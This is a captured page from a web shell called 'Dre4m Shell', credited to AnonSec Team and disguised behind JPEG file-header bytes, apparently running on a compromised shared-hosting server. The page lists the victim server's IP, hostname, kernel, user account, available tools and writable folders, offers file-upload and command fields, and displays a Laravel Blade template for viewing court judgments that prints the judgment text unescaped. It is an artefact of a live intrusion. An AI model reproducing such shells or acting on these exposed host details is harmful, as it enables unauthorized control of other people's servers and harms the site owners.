ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.188.242.160
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/nicnwebsiteUpgrade/resources/views/Judgment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/nicnwebsiteUpgrade/resources/views/Judgment/view.blade.php
@extends('layouts.layout')
@section('pageTitle')
  View Judgment
@endsection
@section('currentDivision')
    current-menu-item
@stop
<!-- /Header -->
@section('content')

@include('_partialView.PageTop', array('fileName' => '' ))
 <div class="container">

        <section id="content">
            <!-- Section -->
            <section class="full-width-bg">
                
                <div class="row">
                
                    <div class="col-lg-12 col-md-12 col-sm-12">
                        
                         <div class="col-md-12"> 
                   
                    {{ csrf_field() }}
                               
                              <hr /> 
                              
                    <div class="shop-single-review clearfix">
                        
                        <div class="table-responsive">
                            <table class="table table-striped" >
                                <thead> 
                                    <tr> 
                                        <th>Judgment</th>
                                    </tr> 
                                </thead>
                                <tbody> 
                                    <tr>
                                        <td>{!! $judgement->judgement !!}</td>
                                                        
                                    </tr>
                                </tbody>
                            </table>
                          </div>
                      <div class="paginate"></div> 
                    </div> 
                    
                    
                    
                </div>

                       

                    </div>
                    
                  

                </div>
            </section>
            <!-- /SideBar Section -->

        </section>

    </div>
<div class="modal" id="myModal">
  <div class="modal-dialog">
    <div class="modal-content">

      <!-- Modal Header -->
      <div class="modal-header">
        <h4 class="modal-title">Judgment</h4>
        <button type="button" class="close" data-dismiss="modal">&times;</button>
      </div>

      <!-- Modal body -->
      <div class="modal-body">
        <p id="view_judgment"></p>
      </div>

      <!-- Modal footer -->
      <div class="modal-footer">
        <button type="button" class="btn btn-danger" data-dismiss="modal">Close</button>
      </div>

    </div>
  </div>
</div>
@stop
@section('styles')
<link rel="stylesheet" type="text/css" href="{{asset('main/css/datepicker.min.css')}}">
<link rel="stylesheet" type="text/css" href="{{asset('main/css/custom-style.css')}}">

<style> 

    .table, th, td {
      border: 1px solid black!important;
      width:1000px!important;
    }

  .textbox { 
    border: 1px;
    background-color: #66FFBA; 
    outline:0; 
    height:25px; 
    width: 275px; 
  } 
  $('.autocomplete-suggestions').css({
    color: 'red'
  });

  .autocomplete-suggestions{
    color:#66FFBA;
  }
</style> 
@stop

@section('scripts')
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

<script type="text/javascript">

 function funcView(x)
 {
     //alert(x);
    //document.getElementById('view_judgment').value = x;
        
        
    $("#myModal").modal('show')
 }
  $(function() {
      
      $("#party").autocomplete({
        serviceUrl: "{{url('/search/byparties')}}",
        minLength: 10,
        onSelect: function (suggestion) {
            $('#id').val(suggestion.data);
            
        }
      });
  });
</script>

<script type="text/javascript">
  $(function() {
      
      $("#panel").autocomplete({
        serviceUrl: "{{url('/search/bypanel')}}",
        minLength: 10,
        onSelect: function (suggestion) {
            $('#id').val(suggestion.data);
            
        }
      });
  });
</script>


@stop


Anon7 - 2022
AnonSec Team